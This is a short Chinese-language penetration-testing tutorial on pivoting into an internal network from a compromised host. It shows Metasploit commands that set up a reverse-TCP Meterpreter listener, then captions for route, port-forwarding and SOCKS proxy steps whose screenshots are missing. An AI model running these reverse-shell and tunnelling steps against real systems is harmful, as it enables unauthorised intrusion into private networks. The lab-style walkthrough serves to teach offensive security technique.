介绍

当我们好不容易通过外网打点成功获取一台主机的控制权时,如何渗透入内网来扩大战果呢?一般内网服务器都会被设置为不出网的状态,这时我们就需要用到端口转发和设置隧道来建立起攻击机与内网主机的通信通道,架设起内网渗透的桥梁!

开启msf之路

目标监听

1. 开启控制台

msfconsole

控制台

2. 打开监听模块

use exploit/multi/handler

3. 设置连接的payload类型

set payload windows/meterpreter/reverse_tcp

4. 设置监听IP

set lhost 192.168.179.129

5. 设置监听端口

set lport 7777

6. 查看配置设置情况

show options

show

7. 最后run

run

8. 查看肉鸡网络配置,发现有两张网卡分别为192.168.179.0/24网段和12.12.12.0/24网段

12.12.12.0

192.168.179.0

9. 在12.12.12.0/24网段中存在一台不出网的服务器,但可与肉鸡通信

不出网ip

不出网ping

10. 肉鸡能与内网服务器通信

肉鸡ip

肉鸡ping

11. 攻击机不能与内网服务器通信

攻击机不能通内网

端口转发

转发

12. 成功访问内网服务器HTTP服务

本地访问成功

设置隧道

13. 在肉鸡上设置路由功能,将12.12.12.0/24网段联通

run

14. 挂起链接会话

挂起

15. 在本机设置路由12.12.12.0/24网段交由会话1的肉鸡进行转发

存路由

16. 输出路由配置进行检查

输出看看

17. 运行kali自带的代理模块,可不用设置直接使用默认配置

show

run

18. 更改代理器的配置文件,将信息修改成与模块配置一致

更改配置文件

19. 开启代理功能访问内网服务器

访问成功